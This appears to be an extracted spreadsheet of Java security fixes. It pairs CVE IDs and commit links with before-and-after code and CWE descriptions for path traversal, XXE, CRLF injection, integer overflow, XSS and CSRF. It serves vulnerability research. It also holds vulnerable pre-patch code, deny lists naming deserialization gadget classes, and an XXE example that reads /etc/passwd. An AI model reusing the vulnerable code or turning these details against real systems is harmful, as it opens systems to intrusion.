         * that the outputdir + name doesn't leave the outputdir. See
         * DirectoryTraversalMaliciousTest for details.
         */
        if (name.indexOf("..") != -1 &amp;&amp; !file.getCanonicalPath().startsWith(outputDir.getCanonicalPath())) {
          throw new ZipException("The file "+name+" is trying to leave the target output directory of "+outputDir+". Ignoring this file.");
        }
</t>
  </si>
  <si>
    <t>Fixed potential security vulnerability reported by Snyk Security Rese……arch Team
This is an arbitrary file write vulnerability, that can be achieved using a specially crafted zip archive, that holds path traversal filenames. So when the filename gets concatenated to the target extraction directory, the final path ends up outside of the target folder.</t>
  </si>
  <si>
    <t>CVE-2018-12022</t>
  </si>
  <si>
    <t>https://github.com/FasterXML/jackson-databind/commit/28badf7ef60ac3e7ef151cd8e8ec010b8479226a</t>
  </si>
  <si>
    <t>SubTypeValidator.java</t>
  </si>
  <si>
    <t>28badf7ef60ac3e7ef151cd8e8ec010b8479226a</t>
  </si>
  <si>
    <t xml:space="preserve">        // [databind#2052]: Jodd-db, with jndi/ldap lookup
        s.add("jodd.db.connection.DataSourceConnectionProvider");
        // [databind#2058]: Oracle JDBC driver, with jndi/ldap lookup
        s.add("oracle.jdbc.connector.OracleManagedConnectionFactory");
        s.add("oracle.jdbc.rowset.OracleJDBCRowSet");
</t>
  </si>
  <si>
    <t>Backport #2052, #2058 fixes for 2.7.9.4</t>
  </si>
  <si>
    <t>CWE-835</t>
  </si>
  <si>
    <t>CVE-2018-12418</t>
  </si>
  <si>
    <t>https://github.com/junrar/junrar/commit/ad8d0ba8e155630da8a1215cee3f253e0af45817</t>
  </si>
  <si>
    <t>Archive.java</t>
  </si>
  <si>
    <t>ad8d0ba8e155630da8a1215cee3f253e0af45817</t>
  </si>
  <si>
    <t xml:space="preserve">			byte[] baseBlockBuffer = new byte[BaseBlock.BaseBlockSize];
				byte[] mainbuff = new byte[toRead];
				byte[] signBuff = new byte[toRead];
				byte[] avBuff = new byte[toRead];
				byte[] commBuff = new byte[toRead];
					byte[] endArchBuff = new byte[toRead];
				byte[] blockHeaderBuffer = new byte[BlockHeader.blockHeaderSize];
					byte[] fileHeaderBuffer = new byte[toRead];
					byte[] protectHeaderBuffer = new byte[toRead];
					byte[] subHeadbuffer = new byte[SubBlockHeader.SubBlockHeaderSize];
						byte[] macHeaderbuffer = new byte[MacInfoHeader.MacInfoHeaderSize];
						byte[] eaHeaderBuffer = new byte[EAHeader.EAHeaderSize];
						byte[] uoHeaderBuffer = new byte[toRead];
</t>
  </si>
  <si>
    <t xml:space="preserve">import java.util.HashSet;
import java.util.Set;
	private static int MAX_HEADER_SIZE = 20971520;//20MB
		//keep track of positions already processed for
		//more robustness against corrupt files
		Set&lt;Long&gt; processedPositions = new HashSet&lt;Long&gt;();
			byte[] baseBlockBuffer = safelyAllocate(BaseBlock.BaseBlockSize, MAX_HEADER_SIZE);
				byte[] mainbuff = safelyAllocate(toRead, MAX_HEADER_SIZE);
				byte[] signBuff = safelyAllocate(toRead, MAX_HEADER_SIZE);
				byte[] avBuff = safelyAllocate(toRead, MAX_HEADER_SIZE);
				byte[] commBuff = safelyAllocate(toRead, MAX_HEADER_SIZE);
				if (processedPositions.contains(newpos)) {
					throw new RarException(RarExceptionType.badRarArchive);
				}
				processedPositions.add(newpos);
					byte[] endArchBuff = safelyAllocate(toRead, MAX_HEADER_SIZE);
				byte[] blockHeaderBuffer = safelyAllocate(BlockHeader.blockHeaderSize, MAX_HEADER_SIZE);
					byte[] fileHeaderBuffer = safelyAllocate(toRead, MAX_HEADER_SIZE);
					if (processedPositions.contains(newpos)) {
						throw new RarException(RarExceptionType.badRarArchive);
					}
					processedPositions.add(newpos);
					byte[] protectHeaderBuffer = safelyAllocate(toRead, MAX_HEADER_SIZE);
					if (processedPositions.contains(newpos)) {
						throw new RarException(RarExceptionType.badRarArchive);
					}
					processedPositions.add(newpos);
					byte[] subHeadbuffer = safelyAllocate(SubBlockHeader.SubBlockHeaderSize, MAX_HEADER_SIZE);
						byte[] macHeaderbuffer = safelyAllocate(MacInfoHeader.MacInfoHeaderSize, MAX_HEADER_SIZE);
						byte[] eaHeaderBuffer = safelyAllocate(EAHeader.EAHeaderSize, MAX_HEADER_SIZE);
						byte[] uoHeaderBuffer = safelyAllocate(toRead, MAX_HEADER_SIZE);
	private static byte[] safelyAllocate(long len, int maxSize) throws RarException {
		if (maxSize &lt; 0) {
			throw new IllegalArgumentException("maxsize must be &gt;= 0");
		}
		if (len &lt; 0 || len &gt; (long)maxSize) {
			throw new RarException(RarExceptionType.badRarArchive);
		}
		return new byte[(int)len];
	}
</t>
  </si>
  <si>
    <t>make Archive slightly more robust against corrupt files. Add (#8)unit test file from Apache Tika.</t>
  </si>
  <si>
    <t>Loop with Unreachable Exit Condition ('Infinite Loop')</t>
  </si>
  <si>
    <t>The program contains an iteration or loop with an exit condition that cannot be reached, i.e., an infinite loop.</t>
  </si>
  <si>
    <t>If the loop can be influenced by an attacker, this weakness could allow attackers to consume excessive resources such as CPU or memory.</t>
  </si>
  <si>
    <t>CWE-20</t>
  </si>
  <si>
    <t>CVE-2018-12537</t>
  </si>
  <si>
    <t>https://github.com/eclipse/vert.x/commit/1bb6445226c39a95e7d07ce3caaf56828e8aab72</t>
  </si>
  <si>
    <t>HttpHeaders.java</t>
  </si>
  <si>
    <t>1bb6445226c39a95e7d07ce3caaf56828e8aab72</t>
  </si>
  <si>
    <t xml:space="preserve">    return io.netty.handler.codec.http.HttpHeaders.newEntity(value);
</t>
  </si>
  <si>
    <t xml:space="preserve">import io.netty.util.AsciiString;
import io.vertx.core.http.impl.HttpUtils;
    HttpUtils.validateHeader(value);
    return new AsciiString(value);
</t>
  </si>
  <si>
    <t>Http header CR / LF validation - fixes #2470</t>
  </si>
  <si>
    <t>Improper Input Validation</t>
  </si>
  <si>
    <t>The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.</t>
  </si>
  <si>
    <t>Input validation is a frequently-used technique for checking potentially dangerous inputs in order to ensure that the inputs are safe for processing within the code, or when communicating with other components. When software does not validate input properly, an attacker is able to craft the input in a form that is not expected by the rest of the application. This will lead to parts of the system receiving unintended input, which may result in altered control flow, arbitrary control of a resource, or arbitrary code execution. Input validation is not the only technique for processing input, however. Other techniques attempt to transform potentially-dangerous input into something safe, such as filtering (CWE-790) - which attempts to remove dangerous inputs - or encoding/escaping (CWE-116), which attempts to ensure that the input is not misinterpreted when it is included in output to another component. Other techniques exist as well (see CWE-138 for more examples.) Input validation can be applied to: raw data - strings, numbers, parameters, file contents, etc. metadata - information about the raw data, such as headers or size Data can be simple or structured. Structured data can be composed of many nested layers, composed of combinations of metadata and raw data, with other simple or structured data. Many properties of raw data or metadata may need to be validated upon entry into the code, such as: specified quantities such as size, length, frequency, price, rate, number of operations, time, etc. implied or derived quantities, such as the actual size of a file instead of a specified size indexes, offsets, or positions into more complex data structures symbolic keys or other elements into hash tables, associative arrays, etc. well-formedness, i.e. syntactic correctness - compliance with expected syntax lexical token correctness - compliance with rules for what is treated as a token specified or derived type - the actual type of the input (or what the input appears to be) consistency - between individual data elements, between raw data and metadata, between references, etc. conformance to domain-specific rules, e.g. business logic equivalence - ensuring that equivalent inputs are treated the same authenticity, ownership, or other attestations about the input, e.g. a cryptographic signature to prove the source of the data Implied or derived properties of data must often be calculated or inferred by the code itself. Errors in deriving properties may be considered a contributing factor to improper input validation. Note that input validation has very different meanings to different people, or within different classification schemes. Caution must be used when referencing this CWE entry or mapping to it. For example, some weaknesses might involve inadvertently giving control to an attacker over an input when they should not be able to provide an input at all, but sometimes this is referred to as input validation. Finally, it is important to emphasize that the distinctions between input validation and output escaping are often blurred, and developers must be careful to understand the difference, including how input validation is not always sufficient to prevent vulnerabilities, especially when less stringent data types must be supported, such as free-form text. Consider a SQL injection scenario in which a person's last name is inserted into a query. The name O'Reilly would likely pass the validation step since it is a common last name in the English language. However, this valid name cannot be directly inserted into the database because it contains the ' apostrophe character, which would need to be escaped or otherwise transformed. In this case, removing the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded.</t>
  </si>
  <si>
    <t>Http2HeadersAdaptor.java</t>
  </si>
  <si>
    <t xml:space="preserve">    HttpUtils.validateHeader(name, value);
    HttpUtils.validateHeader(name, values);
    HttpUtils.validateHeader(name, value);
    HttpUtils.validateHeader(name, values);
    HttpUtils.validateHeader(name, value);
    HttpUtils.validateHeader(name, values);
    HttpUtils.validateHeader(name, value);
    HttpUtils.validateHeader(name, values);
</t>
  </si>
  <si>
    <t>Http2ServerResponseImpl.java</t>
  </si>
  <si>
    <t xml:space="preserve">import io.netty.channel.ChannelFuture;
import io.vertx.core.VertxException;
</t>
  </si>
  <si>
    <t>HttpClientRequestImpl.java</t>
  </si>
  <si>
    <t xml:space="preserve">import io.vertx.core.http.CaseInsensitiveHeaders;
  private CaseInsensitiveHeaders headers;
      headers = new CaseInsensitiveHeaders();
</t>
  </si>
  <si>
    <t xml:space="preserve">import io.vertx.core.http.impl.headers.VertxHttpHeaders;
  private VertxHttpHeaders headers;
      headers = new VertxHttpHeaders();
</t>
  </si>
  <si>
    <t>HttpUtils.java</t>
  </si>
  <si>
    <t xml:space="preserve">  public static void validateHeader(CharSequence name, CharSequence value) {
    validateHeader(name);
    validateHeader(value);
  }
  public static void validateHeader(CharSequence name, Iterable&lt;? extends CharSequence&gt; values) {
    validateHeader(name);
    values.forEach(HttpUtils::validateHeader);
  }
  public static void validateHeader(CharSequence value) {
    for (int i = 0;i &lt; value.length();i++) {
      char c = value.charAt(i);
      if (c == '\r' || c == '\n') {
        throw new IllegalArgumentException("Illegal header character: " + ((int)c));
      }
    }
  }
</t>
  </si>
  <si>
    <t>VertxHttpHeaders.java</t>
  </si>
  <si>
    <t xml:space="preserve">  private final VertxHttpHeaders.MapEntry head = new VertxHttpHeaders.MapEntry(-1, null, null);
</t>
  </si>
  <si>
    <t xml:space="preserve">import io.vertx.core.http.impl.HttpUtils;
  private final VertxHttpHeaders.MapEntry head = new VertxHttpHeaders.MapEntry();
    MapEntry() {
      this.hash = -1;
      this.key = null;
      this.value = null;
    }
    if (!(name instanceof AsciiString)) {
      HttpUtils.validateHeader(name);
    }
    if (!(value instanceof AsciiString)) {
      HttpUtils.validateHeader(value);
    }
</t>
  </si>
  <si>
    <t>CVE-2018-14371</t>
  </si>
  <si>
    <t>https://github.com/eclipse-ee4j/mojarra/commit/1b434748d9239f42eae8aa7d37d7a0930c061e24</t>
  </si>
  <si>
    <t>InstanceFactory.java</t>
  </si>
  <si>
    <t>1b434748d9239f42eae8aa7d37d7a0930c061e24</t>
  </si>
  <si>
    <t xml:space="preserve">        notNull(CONTEXT, context);
        notNull(COMPONENT_TYPE, componentType);
</t>
  </si>
  <si>
    <t>fixing CTS failure issue in master branch</t>
  </si>
  <si>
    <t>ResourceManager.java</t>
  </si>
  <si>
    <t xml:space="preserve">        if(localePrefix != null){
</t>
  </si>
  <si>
    <t xml:space="preserve">        if(localePrefix != null &amp;&amp; !nameContainsForbiddenSequence(localePrefix)){
</t>
  </si>
  <si>
    <t>CVE-2018-14718</t>
  </si>
  <si>
    <t>https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44</t>
  </si>
  <si>
    <t>BeanDeserializerFactory.java</t>
  </si>
  <si>
    <t>87d29af25e82a249ea15858e2d4ecbf64091db44</t>
  </si>
  <si>
    <t xml:space="preserve">        // [databind#2097]: some 3rd party, one JDK-bundled
        s.add("org.slf4j.ext.EventData");
        s.add("flex.messaging.util.concurrent.AsynchBeansWorkManagerExecutor");
        s.add("com.sun.deploy.security.ruleset.DRSHelper");
        s.add("org.apache.axis2.jaxws.spi.handler.HandlerResolverImpl");
</t>
  </si>
  <si>
    <t>Fix #2097 for 2.6.7.2</t>
  </si>
  <si>
    <t>CWE-611</t>
  </si>
  <si>
    <t>CVE-2018-15531</t>
  </si>
  <si>
    <t>https://github.com/javamelody/javamelody/commit/ef111822562d0b9365bd3e671a75b65bd0613353</t>
  </si>
  <si>
    <t>PayloadNameRequestWrapper.java</t>
  </si>
  <si>
    <t>ef111822562d0b9365bd3e671a75b65bd0613353</t>
  </si>
  <si>
    <t xml:space="preserve">			factory.setProperty(XMLInputFactory.SUPPORT_DTD, false); // disable DTDs entirely for that factory
			factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false); // disable external entities
</t>
  </si>
  <si>
    <t>fix for security</t>
  </si>
  <si>
    <t>Improper Restriction of XML External Entity Reference</t>
  </si>
  <si>
    <t>The software processes an XML document that can contain XML entities with URIs that resolve to documents outside of the intended sphere of control, causing the product to embed incorrect documents into its output.</t>
  </si>
  <si>
    <t>XML documents optionally contain a Document Type Definition (DTD), which, among other features, enables the definition of XML entities. It is possible to define an entity by providing a substitution string in the form of a URI. The XML parser can access the contents of this URI and embed these contents back into the XML document for further processing. By submitting an XML file that defines an external entity with a file:// URI, an attacker can cause the processing application to read the contents of a local file. For example, a URI such as file:///c:/winnt/win.ini designates (in Windows) the file C:Winntwin.ini, or file:///etc/passwd designates the password file in Unix-based systems. Using URIs with other schemes such as http://, the attacker can force the application to make outgoing requests to servers that the attacker cannot reach directly, which can be used to bypass firewall restrictions or hide the source of attacks such as port scanning. Once the content of the URI is read, it is fed back into the application that is processing the XML. This application may echo back the data (e.g. in an error message), thereby exposing the file contents.</t>
  </si>
  <si>
    <t>CVE-2018-18434</t>
  </si>
  <si>
    <t>https://github.com/linlinjava/litemall/commit/49ab94d0052672d4fb642505d44b94a18abea332</t>
  </si>
  <si>
    <t>WxStorageController.java</t>
  </si>
  <si>
    <t>49ab94d0052672d4fb642505d44b94a18abea332</t>
  </si>
  <si>
    <t xml:space="preserve">            ResponseEntity.notFound();
            ResponseEntity.notFound();
            ResponseEntity.notFound();
            ResponseEntity.notFound();
</t>
  </si>
  <si>
    <t xml:space="preserve">            return ResponseEntity.notFound().build();
        }
        if(key.contains("../")){
            return ResponseEntity.badRequest().build();
            return ResponseEntity.notFound().build();
            return ResponseEntity.notFound().build();
        }
        if(key.contains("../")){
            return ResponseEntity.badRequest().build();
            return ResponseEntity.notFound().build();
</t>
  </si>
  <si>
    <t>fix[litemall-wx-api]: 修复文件路径中包含"../"带来的安全问题</t>
  </si>
  <si>
    <t>CVE-2018-18467</t>
  </si>
  <si>
    <t>https://github.com/siacs/Conversations/commit/7177c523a1b31988666b9337249a4f1d0c36f479</t>
  </si>
  <si>
    <t>ConversationFragment.java</t>
  </si>
  <si>
    <t>7177c523a1b31988666b9337249a4f1d0c36f479</t>
  </si>
  <si>
    <t xml:space="preserve">                appendText(text);
    public void appendText(String text) {
        String previous = this.binding.textinput.getText().toString();
</t>
  </si>
  <si>
    <t xml:space="preserve">import android.text.TextUtils;
        final boolean doNotAppend = extras.getBoolean(ConversationsActivity.EXTRA_DO_NOT_APPEND, false);
                appendText(text, doNotAppend);
    public void appendText(String text, final boolean doNotAppend) {
        final Editable editable = this.binding.textinput.getText();
        String previous =  editable == null ? "" : editable.toString();
        if (doNotAppend &amp;&amp; !TextUtils.isEmpty(previous)) {
            Toast.makeText(getActivity(),R.string.already_drafting_message, Toast.LENGTH_LONG).show();
            return;
        }
</t>
  </si>
  <si>
    <t>Do not insert text shared over XMPP uri when already drafting messageXMPP uris in the style of `xmpp:test@domain.tld?body=Something` can be used to
directly share a message with a specific contact. Previously the text was
always appended to the message currently in draft. The message was never send
automatically. Essentially those links where treated like normal text share
intents (for example when sharing a URL from the browser) but without the
contact selection.
There is a concern (CVE-2018-18467) that when this URI is invoked automatically
and the user is currently drafting a long message to that particular contact
the text could be inserted in the draft field (input box) without the user
noticing.
To circumvent that the text shared over XMPP uris that contain a particular
contact is now appended only if the draft box is currently empty.
Sharing text normally (**with** manual contact selection) is still treated the
same; meaning the shared text will be appended to the current draft. This is
intended behaviour to make the
'Hey I have this cool link here;' *open browser*, *share link* - secenario
work.</t>
  </si>
  <si>
    <t>ConversationsActivity.java</t>
  </si>
  <si>
    <t xml:space="preserve">    public static final String EXTRA_DO_NOT_APPEND = "do_not_append";
</t>
  </si>
  <si>
    <t>StartConversationActivity.java</t>
  </si>
  <si>
    <t xml:space="preserve">				switchToConversation(contact, null);
				switchToConversation(contact, invite == null ? null : invite.getBody());
	protected void switchToConversation(Contact contact, String body) {
		Conversation conversation = xmppConnectionService
				.findOrCreateConversation(contact.getAccount(),
						contact.getJid(), false, true);
		switchToConversation(conversation, body);
				switchToConversation(muc, invite.getBody());
				switchToConversation(contact, invite.getBody());
			switchToConversation(contact, invite.getBody());
</t>
  </si>
  <si>
    <t xml:space="preserve">				switchToConversation(contact);
				switchToConversationDoNotAppend(contact, invite == null ? null : invite.getBody());
	protected void switchToConversation(Contact contact) {
		Conversation conversation = xmppConnectionService.findOrCreateConversation(contact.getAccount(), contact.getJid(), false, true);
		switchToConversation(conversation);
	}
	protected void switchToConversationDoNotAppend(Contact contact, String body) {
		Conversation conversation = xmppConnectionService.findOrCreateConversation(contact.getAccount(), contact.getJid(), false, true);
		switchToConversationDoNotAppend(conversation, body);
				switchToConversationDoNotAppend(muc, invite.getBody());
				switchToConversationDoNotAppend(contact, invite.getBody());
			switchToConversationDoNotAppend(contact, invite.getBody());
</t>
  </si>
  <si>
    <t>XmppActivity.java</t>
  </si>
  <si>
    <t xml:space="preserve">		switchToConversation(conversation, text, true, null, false);
		switchToConversation(conversation, text, false, null, false);
		switchToConversation(conversation, null, false, nick, false);
		switchToConversation(conversation, null, false, nick, true);
	private void switchToConversation(Conversation conversation, String text, boolean asQuote, String nick, boolean pm) {
</t>
  </si>
  <si>
    <t xml:space="preserve">		switchToConversation(conversation, text, true, null, false, false);
		switchToConversation(conversation, text, false, null, false, false);
	}
	public void switchToConversationDoNotAppend(Conversation conversation, String text) {
		switchToConversation(conversation, text, false, null, false, true);
		switchToConversation(conversation, null, false, nick, false, false);
		switchToConversation(conversation, null, false, nick, true, false);
	private void switchToConversation(Conversation conversation, String text, boolean asQuote, String nick, boolean pm, boolean doNotAppend) {
		if (doNotAppend) {
			intent.putExtra(ConversationsActivity.EXTRA_DO_NOT_APPEND, true);
		}
</t>
  </si>
  <si>
    <t>CWE-190</t>
  </si>
  <si>
    <t>CVE-2018-18928</t>
  </si>
  <si>
    <t>https://github.com/unicode-org/icu/commit/53d8c8f3d181d87a6aa925b449b51c4a2c922a51</t>
  </si>
  <si>
    <t>DecimalQuantity_AbstractBCD.java</t>
  </si>
  <si>
    <t>53d8c8f3d181d87a6aa925b449b51c4a2c922a51</t>
  </si>
  <si>
    <t xml:space="preserve">        if (_scale &lt; 0) {
</t>
  </si>
  <si>
    <t xml:space="preserve">        if (_scale == Integer.MIN_VALUE) {
            result.append("-2147483648");
            return;
        } else if (_scale &lt; 0) {
</t>
  </si>
  <si>
    <t>ICU-20246 Fixing another integer overflow in number parsing.</t>
  </si>
  <si>
    <t>Integer Overflow or Wraparound</t>
  </si>
  <si>
    <t>The software performs a calculation that can produce an integer overflow or wraparound, when the logic assumes that the resulting value will always be larger than the original value. This can introduce other weaknesses when the calculation is used for resource management or execution control.</t>
  </si>
  <si>
    <t>An integer overflow or wraparound occurs when an integer value is incremented to a value that is too large to store in the associated representation. When this occurs, the value may wrap to become a very small or negative number. While this may be intended behavior in circumstances that rely on wrapping, it can have security consequences if the wrap is unexpected. This is especially the case if the integer overflow can be triggered using user-supplied inputs. This becomes security-critical when the result is used to control looping, make a security decision, or determine the offset or size in behaviors such as memory allocation, copying, concatenation, etc.</t>
  </si>
  <si>
    <t>DecimalQuantity_DualStorageBCD.java</t>
  </si>
  <si>
    <t xml:space="preserve">            result = result.scaleByPowerOfTen(scale);
</t>
  </si>
  <si>
    <t xml:space="preserve">            try {
                result = result.scaleByPowerOfTen(scale);
            } catch (ArithmeticException e) {
                if (e.getMessage().contains("Underflow")) {
                    result = BigDecimal.ZERO;
                } else {
                    throw e;
                }
            }
</t>
  </si>
  <si>
    <t>CVE-2018-19360</t>
  </si>
  <si>
    <t>https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b</t>
  </si>
  <si>
    <t>42912cac4753f3f718ece875e4d486f8264c2f2b</t>
  </si>
  <si>
    <t xml:space="preserve">        // [databind#2186]: yet more 3rd party gadgets
        s.add("org.jboss.util.propertyeditor.DocumentEditor");
        s.add("org.apache.openjpa.ee.RegistryManagedRuntime");
        s.add("org.apache.openjpa.ee.JNDIManagedRuntime");
        s.add("org.apache.axis2.transport.jms.JMSOutTransportInfo");        
</t>
  </si>
  <si>
    <t>Backport #2186 to 2.7.9[.5]</t>
  </si>
  <si>
    <t>CVE-2018-20227</t>
  </si>
  <si>
    <t>https://github.com/eclipse/rdf4j/commit/df15a4d7a8f2789c043b27c9eafe1b30316cfa79</t>
  </si>
  <si>
    <t>df15a4d7a8f2789c043b27c9eafe1b30316cfa79</t>
  </si>
  <si>
    <t xml:space="preserve">	public static boolean isZipStream(InputStream in)
		throws IOException
	{
	public static void extract(File zipFile, File destDir)
		throws IOException
	{
	 *         when something untowards happens during the extraction process
	public static void extract(ZipFile zipFile, File destDir)
		throws IOException
	{
	public static void writeEntry(ZipFile zipFile, ZipEntry entry, File destDir)
		throws IOException
	{
		}
		else {
</t>
  </si>
  <si>
    <t xml:space="preserve">	/**
	 * Test if an input stream is a zip input stream by checking the "magic number"
	 * 
	 * @param in input stream
	 * @return true if start of input stream matches magic number
	 * @throws IOException 
	 */
	public static boolean isZipStream(InputStream in) throws IOException {
	public static void extract(File zipFile, File destDir) throws IOException {
	 *         when something untoward happens during the extraction process
	public static void extract(ZipFile zipFile, File destDir) throws IOException {
	public static void writeEntry(ZipFile zipFile, ZipEntry entry, File destDir) throws IOException {
		if (! outFile.getCanonicalFile().toPath().startsWith(destDir.toPath())) {
			throw new IOException("Zip entry outside destination directory: " + entry.getName());
		}
		} else {
</t>
  </si>
  <si>
    <t>Verify that zip file entries don't try to escape the parent dir + testSigned-off-by: Bart Hanssens &lt;bart.hanssens@bosa.fgov.be&gt;</t>
  </si>
  <si>
    <t>CVE-2018-20433</t>
  </si>
  <si>
    <t>https://github.com/zhutougg/c3p0/commit/2eb0ea97f745740b18dd45e4a909112d4685f87b</t>
  </si>
  <si>
    <t>C3P0ConfigXmlUtils.java</t>
  </si>
  <si>
    <t>2eb0ea97f745740b18dd45e4a909112d4685f87b</t>
  </si>
  <si>
    <t xml:space="preserve">	fact.setExpandEntityReferences(false);
</t>
  </si>
  <si>
    <t>Repair XXE vulnerability at initialization</t>
  </si>
  <si>
    <t>CVE-2018-20437</t>
  </si>
  <si>
    <t>https://github.com/wuyouzhuguli/FEBS-Shiro/commit/9a753215b0969a5d5b5bfe8c68585339fee96260</t>
  </si>
  <si>
    <t>CommonController.java</t>
  </si>
  <si>
    <t>9a753215b0969a5d5b5bfe8c68585339fee96260</t>
  </si>
  <si>
    <t xml:space="preserve">    public void fileDownload(String fileName, Boolean delete, HttpServletResponse response) throws IOException {
            if (delete &amp;&amp; file.exists()) {
            }
</t>
  </si>
  <si>
    <t xml:space="preserve">import cc.mrbird.common.exception.FileDownloadException;
import org.apache.commons.lang3.StringUtils;
    public void fileDownload(String fileName, Boolean delete, HttpServletResponse response) throws IOException, FileDownloadException {
        if (StringUtils.isNotBlank(fileName) &amp;&amp; !fileName.endsWith(".xlsx"))
            throw new FileDownloadException("不支持该类型文件下载");
        if (!file.exists())
            throw new FileDownloadException("文件未找到");
            if (delete)
</t>
  </si>
  <si>
    <t>提升文件下载安全性</t>
  </si>
  <si>
    <t>FileDownloadException.java</t>
  </si>
  <si>
    <t xml:space="preserve">package cc.mrbird.common.exception;
/**
 * 文件下载异常
 */
public class FileDownloadException  extends Exception {
    private static final long serialVersionUID = -3608667856397125671L;
    public FileDownloadException(String message) {
        super(message);
    }
}
</t>
  </si>
  <si>
    <t>GlobalExceptionHandler.java</t>
  </si>
  <si>
    <t xml:space="preserve">import cc.mrbird.common.exception.FileDownloadException;
    @ExceptionHandler(value = FileDownloadException.class)
    public ResponseBo handleFileDownloadException(FileDownloadException e) {
        return ResponseBo.error(e.getMessage());
    }
</t>
  </si>
  <si>
    <t>https://github.com/wuyouzhuguli/FEBS-Shiro/commit/a9706b1b3c96bacece24886429b4423c3a467acd</t>
  </si>
  <si>
    <t>a9706b1b3c96bacece24886429b4423c3a467acd</t>
  </si>
  <si>
    <t xml:space="preserve">        if (StringUtils.isNotBlank(fileName) &amp;&amp; !fileName.endsWith(".xlsx"))
</t>
  </si>
  <si>
    <t xml:space="preserve">        if (StringUtils.isNotBlank(fileName) &amp;&amp; !fileName.endsWith(".xlsx") &amp;&amp; !fileName.endsWith(".csv"))
</t>
  </si>
  <si>
    <t>CVE-2018-20594</t>
  </si>
  <si>
    <t>https://github.com/hs-web/hsweb-framework/commit/b72a2275ed21240296c6539bae1049c56abb542f</t>
  </si>
  <si>
    <t>ModelType.java</t>
  </si>
  <si>
    <t>b72a2275ed21240296c6539bae1049c56abb542f</t>
  </si>
  <si>
    <t xml:space="preserve">package org.hswebframework.web.workflow.enums;
/**
 * @author zhouhao
 * @since 3.0.5
 */
public enum ModelType {
    bpmn, json
}
</t>
  </si>
  <si>
    <t>fix #107 修复反射型xss</t>
  </si>
  <si>
    <t>FlowableModelManagerController.java</t>
  </si>
  <si>
    <t xml:space="preserve">                       @PathVariable("type") @ApiParam(value = "类型", allowableValues = "bpmn,json", example = "json") String type,
        try {
            Model modelData = repositoryService.getModel(modelId);
            BpmnJsonConverter jsonConverter = new BpmnJsonConverter();
            byte[] modelEditorSource = repositoryService.getModelEditorSource(modelData.getId());
            JsonNode editorNode = new ObjectMapper().readTree(modelEditorSource);
            BpmnModel bpmnModel = jsonConverter.convertToBpmnModel(editorNode);
            // 处理异常
            if (bpmnModel.getMainProcess() == null) {
                response.setStatus(HttpStatus.UNPROCESSABLE_ENTITY.value());
                response.getOutputStream().println("no main process, can't export for dimension: " + type);
                response.flushBuffer();
                return;
            }
            String filename = "";
            byte[] exportBytes = null;
            String mainProcessId = bpmnModel.getMainProcess().getId();
            if ("bpmn".equals(type)) {
                BpmnXMLConverter xmlConverter = new BpmnXMLConverter();
                exportBytes = xmlConverter.convertToXML(bpmnModel);
                filename = mainProcessId + ".bpmn20.xml";
            } else if ("json".equals(type)) {
                exportBytes = modelEditorSource;
                filename = mainProcessId + ".json";
            } else {
                throw new UnsupportedOperationException("不支持的格式:" + type);
            }
            response.setCharacterEncoding("UTF-8");
            response.setContentType("application/octet-stream");
            response.setHeader("Content-Disposition", "attachment; filename=" + URLEncoder.encode(filename, "UTF-8"));
            /*创建输入流*/
            try (ByteArrayInputStream in = new ByteArrayInputStream(exportBytes)) {
                IOUtils.copy(in, response.getOutputStream());
                response.flushBuffer();
                in.close();
            }
        } catch (Exception e) {
            log.error("导出model的xml文件失败：modelId={}, type={}", modelId, type, e);
</t>
  </si>
  <si>
    <t xml:space="preserve">import lombok.SneakyThrows;
import org.hswebframework.web.workflow.enums.ModelType;
    @SneakyThrows
                       @PathVariable("type") @ApiParam(value = "类型", allowableValues = "bpmn,json", example = "json")
                               ModelType type,
        Model modelData = repositoryService.getModel(modelId);
        if (modelData == null) {
            throw new NotFoundException("模型不存在");
        }
        BpmnJsonConverter jsonConverter = new BpmnJsonConverter();
        byte[] modelEditorSource = repositoryService.getModelEditorSource(modelData.getId());
        JsonNode editorNode = new ObjectMapper().readTree(modelEditorSource);
        BpmnModel bpmnModel = jsonConverter.convertToBpmnModel(editorNode);
        // 处理异常
        if (bpmnModel.getMainProcess() == null) {
            throw new UnsupportedOperationException("无法导出模型文件:" + type);
        }
        String filename = "";
        byte[] exportBytes = null;
        String mainProcessId = bpmnModel.getMainProcess().getId();
        if (type == ModelType.bpmn) {
            BpmnXMLConverter xmlConverter = new BpmnXMLConverter();
            exportBytes = xmlConverter.convertToXML(bpmnModel);
            filename = mainProcessId + ".bpmn20.xml";
        } else if (type == ModelType.json) {
            exportBytes = modelEditorSource;
            filename = mainProcessId + ".json";
        } else {
            throw new UnsupportedOperationException("不支持的格式:" + type);
        }
        response.setCharacterEncoding("UTF-8");
        response.setContentType("application/octet-stream");
        response.setHeader("Content-Disposition", "attachment; filename=" + URLEncoder.encode(filename, "UTF-8"));
        /*创建输入流*/
        try (ByteArrayInputStream in = new ByteArrayInputStream(exportBytes)) {
            IOUtils.copy(in, response.getOutputStream());
            response.flushBuffer();
</t>
  </si>
  <si>
    <t>CWE-352</t>
  </si>
  <si>
    <t>CVE-2018-20595</t>
  </si>
  <si>
    <t>https://github.com/hs-web/hsweb-framework/commit/40929e9b0d336a26281a5ed2e0e721d54dd8d2f2</t>
  </si>
  <si>
    <t>ErrorType.java</t>
  </si>
  <si>
    <t>40929e9b0d336a26281a5ed2e0e721d54dd8d2f2</t>
  </si>
  <si>
    <t xml:space="preserve">    STATE_ERROR(4042), //stat错误
</t>
  </si>
  <si>
    <t>fix #107 csrf</t>
  </si>
  <si>
    <t>Cross-Site Request Forgery (CSRF)</t>
  </si>
  <si>
    <t>The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>OAuth2ClientController.java</t>
  </si>
  <si>
    <t xml:space="preserve">            //  if (!state.equals(cachedState)) throw new BusinessException("state error");
</t>
  </si>
  <si>
    <t xml:space="preserve">import org.hswebframework.web.BusinessException;
import org.hswebframework.web.oauth2.core.ErrorType;
            if (!state.equals(cachedState)) {
                throw new BusinessException(ErrorType.STATE_ERROR.name());
            }
</t>
  </si>
  <si>
    <t>CVE-2018-6331</t>
  </si>
  <si>
